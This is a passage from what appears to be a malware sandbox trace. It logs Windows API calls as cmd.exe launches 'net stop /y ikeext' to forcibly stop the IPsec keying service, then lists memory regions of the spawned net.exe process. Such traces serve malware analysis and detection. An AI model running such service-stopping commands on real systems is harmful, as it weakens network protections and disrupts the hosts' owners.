lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0047.288] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49e80640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0047.288] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49e80640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0047.288] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0047.288] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0047.288] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0047.288] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0047.288] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0047.288] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0047.288] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0047.288] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0047.288] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0047.288] GetEnvironmentStringsW () returned 0x332358* [0047.288] FreeEnvironmentStringsW (penv=0x332358) returned 1 [0047.288] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49e80640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0047.288] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49e80640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0047.288] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0047.288] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0047.288] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0047.288] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0047.288] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0047.288] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0047.288] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0047.288] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0047.289] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x26f8e0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0047.289] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x104, lpBuffer=0x26f8e0, lpFilePart=0x26f8dc | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x26f8dc*="system32") returned 0x13 [0047.289] GetFileAttributesW (lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32")) returned 0x10 [0047.289] FindFirstFileW (in: lpFileName="C:\\Windows", lpFindFileData=0x26f65c | out: lpFindFileData=0x26f65c) returned 0x3308f8 [0047.289] FindClose (in: hFindFile=0x3308f8 | out: hFindFile=0x3308f8) returned 1 [0047.289] FindFirstFileW (in: lpFileName="C:\\Windows\\system32", lpFindFileData=0x26f65c | out: lpFindFileData=0x26f65c) returned 0x3308f8 [0047.289] FindClose (in: hFindFile=0x3308f8 | out: hFindFile=0x3308f8) returned 1 [0047.289] GetFileAttributesW (lpFileName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 0x10 [0047.289] SetCurrentDirectoryW (lpPathName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 1 [0047.289] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Windows\\System32") returned 1 [0047.289] GetEnvironmentStringsW () returned 0x3300c8* [0047.289] FreeEnvironmentStringsW (penv=0x3300c8) returned 1 [0047.289] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49e75260 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0047.291] _wcsnicmp (_String1="net ", _String2="cmd ", _MaxCount=0x4) returned 11 [0047.291] SetErrorMode (uMode=0x0) returned 0x8001 [0047.291] SetErrorMode (uMode=0x1) returned 0x0 [0047.292] GetFullPathNameW (in: lpFileName="net stop \\.", nBufferLength=0x208, lpBuffer=0x3207f8, lpFilePart=0x26f858 | out: lpBuffer="C:\\Windows\\system32\\net stop", lpFilePart=0x26f858*="net stop") returned 0x1c [0047.292] SetErrorMode (uMode=0x8001) returned 0x1 [0047.292] NeedCurrentDirectoryForExePathW (ExeName="net stop \\.") returned 1 [0047.292] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49e80640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0047.294] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0047.294] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net stop\\y ikeext.*", fInfoLevelId=0x1, lpFindFileData=0x26f5d4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26f5d4) returned 0xffffffff [0047.294] GetLastError () returned 0x3 [0047.295] GetConsoleOutputCP () returned 0x1b5 [0047.295] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e74260 | out: lpCPInfo=0x49e74260) returned 1 [0047.295] GetUserDefaultLCID () returned 0x409 [0047.295] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49e74950, cchData=8 | out: lpLCData=":") returned 2 [0047.295] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x26fa20, cchData=128 | out: lpLCData="0") returned 2 [0047.295] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x26fa20, cchData=128 | out: lpLCData="0") returned 2 [0047.295] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x26fa20, cchData=128 | out: lpLCData="1") returned 2 [0047.295] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49e74940, cchData=8 | out: lpLCData="/") returned 2 [0047.295] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49e74d80, cchData=32 | out: lpLCData="Mon") returned 4 [0047.295] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49e74d40, cchData=32 | out: lpLCData="Tue") returned 4 [0047.295] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49e74d00, cchData=32 | out: lpLCData="Wed") returned 4 [0047.295] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49e74cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0047.295] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49e74c80, cchData=32 | out: lpLCData="Fri") returned 4 [0047.295] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49e74c40, cchData=32 | out: lpLCData="Sat") returned 4 [0047.295] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49e74c00, cchData=32 | out: lpLCData="Sun") returned 4 [0047.296] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49e74930, cchData=8 | out: lpLCData=".") returned 2 [0047.296] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49e74920, cchData=8 | out: lpLCData=",") returned 2 [0047.296] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0047.296] GetConsoleTitleW (in: lpConsoleTitle=0x3209a8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0047.297] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76590000 [0047.297] GetProcAddress (hModule=0x76590000, lpProcName="CopyFileExW") returned 0x765cac6c [0047.297] GetProcAddress (hModule=0x76590000, lpProcName="IsDebuggerPresent") returned 0x765d3ea8 [0047.297] GetProcAddress (hModule=0x76590000, lpProcName="SetConsoleInputExeNameW") returned 0x765e2732 [0047.297] _wcsicmp (_String1="net", _String2=")") returned 69 [0047.297] _wcsicmp (_String1="FOR", _String2="net") returned -8 [0047.297] _wcsicmp (_String1="FOR/?", _String2="net") returned -8 [0047.297] _wcsicmp (_String1="IF", _String2="net") returned -5 [0047.297] _wcsicmp (_String1="IF/?", _String2="net") returned -5 [0047.297] _wcsicmp (_String1="REM", _String2="net") returned 4 [0047.297] _wcsicmp (_String1="REM/?", _String2="net") returned 4 [0047.299] GetConsoleTitleW (in: lpConsoleTitle=0x26f718, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0047.299] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0047.299] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0047.299] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0047.299] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0047.299] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0047.299] _wcsicmp (_String1="net", _String2="CD") returned 11 [0047.299] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0047.299] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0047.299] _wcsicmp (_String1="net", _String2="REN") returned -4 [0047.299] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0047.299] _wcsicmp (_String1="net", _String2="SET") returned -5 [0047.299] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0047.299] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0047.299] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0047.299] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0047.299] _wcsicmp (_String1="net", _String2="MD") returned 1 [0047.299] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0047.299] _wcsicmp (_String1="net", _String2="RD") returned -4 [0047.299] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0047.299] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0047.299] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0047.299] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0047.299] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0047.299] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0047.299] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0047.299] _wcsicmp (_String1="net", _String2="VER") returned -8 [0047.299] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0047.299] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0047.299] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0047.299] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0047.299] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0047.299] _wcsicmp (_String1="net", _String2="START") returned -5 [0047.299] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0047.299] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0047.299] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0047.299] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0047.300] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0047.300] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0047.300] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0047.300] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0047.300] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0047.300] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0047.300] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0047.300] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0047.300] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0047.300] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0047.300] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0047.300] _wcsicmp (_String1="net", _String2="CD") returned 11 [0047.300] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0047.300] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0047.300] _wcsicmp (_String1="net", _String2="REN") returned -4 [0047.300] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0047.300] _wcsicmp (_String1="net", _String2="SET") returned -5 [0047.300] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0047.300] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0047.300] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0047.300] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0047.300] _wcsicmp (_String1="net", _String2="MD") returned 1 [0047.300] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0047.300] _wcsicmp (_String1="net", _String2="RD") returned -4 [0047.300] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0047.300] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0047.300] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0047.300] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0047.300] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0047.300] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0047.300] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0047.300] _wcsicmp (_String1="net", _String2="VER") returned -8 [0047.300] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0047.300] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0047.300] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0047.300] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0047.300] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0047.300] _wcsicmp (_String1="net", _String2="START") returned -5 [0047.300] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0047.300] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0047.300] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0047.300] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0047.300] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0047.300] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0047.300] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0047.300] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0047.300] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0047.301] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0047.301] _wcsicmp (_String1="net", _String2="FOR") returned 8 [0047.301] _wcsicmp (_String1="net", _String2="IF") returned 5 [0047.301] _wcsicmp (_String1="net", _String2="REM") returned -4 [0047.301] _wcsnicmp (_String1="net", _String2="cmd ", _MaxCount=0x4) returned 11 [0047.301] SetErrorMode (uMode=0x0) returned 0x8001 [0047.301] SetErrorMode (uMode=0x1) returned 0x0 [0047.301] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x331b30, lpFilePart=0x26f238 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x26f238*="system32") returned 0x13 [0047.301] SetErrorMode (uMode=0x8001) returned 0x1 [0047.301] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49e80640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0047.301] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0047.303] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49e80640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0047.303] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0047.303] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x26efb4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26efb4) returned 0x320fa8 [0047.303] FindClose (in: hFindFile=0x320fa8 | out: hFindFile=0x320fa8) returned 1 [0047.303] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x26efb4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26efb4) returned 0xffffffff [0047.303] GetLastError () returned 0x2 [0047.303] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x26efb4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26efb4) returned 0x320fa8 [0047.303] FindClose (in: hFindFile=0x320fa8 | out: hFindFile=0x320fa8) returned 1 [0047.304] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0047.304] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0047.304] GetConsoleTitleW (in: lpConsoleTitle=0x26f4ac, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0047.304] InitializeProcThreadAttributeList (in: lpAttributeList=0x26f334, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x26f3fc | out: lpAttributeList=0x26f334, lpSize=0x26f3fc) returned 1 [0047.304] UpdateProcThreadAttribute (in: lpAttributeList=0x26f334, dwFlags=0x0, Attribute=0x60001, lpValue=0x26f3f4, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x26f334, lpPreviousValue=0x0) returned 1 [0047.304] GetStartupInfoW (in: lpStartupInfo=0x26f2f0 | out: lpStartupInfo=0x26f2f0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0047.304] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0047.304] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0047.304] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0047.304] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0047.304] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0047.304] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0047.304] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0047.304] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0047.304] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0047.304] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0047.304] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0047.304] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0047.304] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0047.304] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0047.304] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0047.304] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0047.304] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0047.304] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0047.304] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0047.304] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0047.304] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0047.304] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0047.304] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0047.304] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0047.304] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0047.304] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0047.304] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0047.304] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0047.304] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0047.304] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0047.304] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0047.304] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0047.304] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0047.306] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop /y ikeext", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x26f390*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop /y ikeext", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x26f3dc | out: lpCommandLine="net stop /y ikeext", lpProcessInformation=0x26f3dc*(hProcess=0x50, hThread=0x4c, dwProcessId=0xb90, dwThreadId=0xb94)) returned 1 [0047.316] CloseHandle (hObject=0x4c) returned 1 [0047.316] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0047.316] GetEnvironmentStringsW () returned 0x3300c8* [0047.316] FreeEnvironmentStringsW (penv=0x3300c8) returned 1 [0047.316] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0047.585] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x26f2d0 | out: lpExitCode=0x26f2d0*=0x2) returned 1 [0047.585] CloseHandle (hObject=0x50) returned 1 [0047.585] _vsnwprintf (in: _Buffer=0x26f418, _BufferCount=0x13, _Format="%08X", _ArgList=0x26f2dc | out: _Buffer="00000002") returned 8 [0047.585] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0047.585] GetEnvironmentStringsW () returned 0x331f30* [0047.585] FreeEnvironmentStringsW (penv=0x331f30) returned 1 [0047.585] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0047.586] GetEnvironmentStringsW () returned 0x331f30* [0047.586] FreeEnvironmentStringsW (penv=0x331f30) returned 1 [0047.586] DeleteProcThreadAttributeList (in: lpAttributeList=0x26f334 | out: lpAttributeList=0x26f334) [0047.586] _get_osfhandle (_FileHandle=1) returned 0x7 [0047.586] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0047.586] _get_osfhandle (_FileHandle=1) returned 0x7 [0047.586] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49e741ac | out: lpMode=0x49e741ac) returned 1 [0047.586] _get_osfhandle (_FileHandle=0) returned 0x3 [0047.586] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49e741b0 | out: lpMode=0x49e741b0) returned 1 [0047.586] SetConsoleInputExeNameW () returned 0x1 [0047.586] GetConsoleOutputCP () returned 0x1b5 [0047.586] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e74260 | out: lpCPInfo=0x49e74260) returned 1 [0047.586] SetThreadUILanguage (LangId=0x0) returned 0x409 [0047.586] exit (_Code=2) Process: id = "8" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x7eef7760" os_pid = "0xb90" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "7" os_parent_pid = "0xb7c" cmd_line = "net stop /y ikeext" cur_dir = "C:\\Windows\\system32\\" os_username = "F71GWAT\\BGC6u8Oy yXGxkR" os_groups = "F71GWAT\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fcb0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 946 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 947 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 948 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 949 start_va = 0x190000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 950 start_va = 0xdf0000 end_va = 0xe07fff entry_point = 0xdf0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 951 start_va = 0x772a0000 end_va = 0x773dbfff entry_point = 0x772a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 952 start_va = 0x774e0000 end_va = 0x774e0fff entry_point = 0x774e0000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 953 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 954 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 955 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 956 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 957 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 958 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 959 start_va = 0x150000 end_va = 0x15ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 960 start_va = 0x320000 end_va = 0x41ffff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 961 start_va = 0x6d0f0000 end_va = 0x6d0fcfff entry_point = 0x6d0f0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 962 start_va = 0x71dd0000 end_va = 0x71de1fff entry_point = 0x71dd0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 963 start_va = 0x734e0000 end_va = 0x734eefff entry_point = 0x734e0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 964 start_va = 0x73e70000 end_va = 0x73e7efff entry_point = 0x73e70000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 965 start_va = 0x73e80000 end_va = 0x73e88fff entry_point = 0x73e80000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 966 start_va = 0x740e0000 end_va = 0x740e6fff entry_point = 0x740e128d region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 967 start_va = 0x740f0000 end_va = 0x7410bfff entry_point = 0x740fa431 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 968 start_va = 0x75290000 end_va = 0x752a8fff entry_point = 0x75291319 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 969 start_va = 0x75470000 end_va = 0x754b9fff entry_point = 0x75477de0 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 970 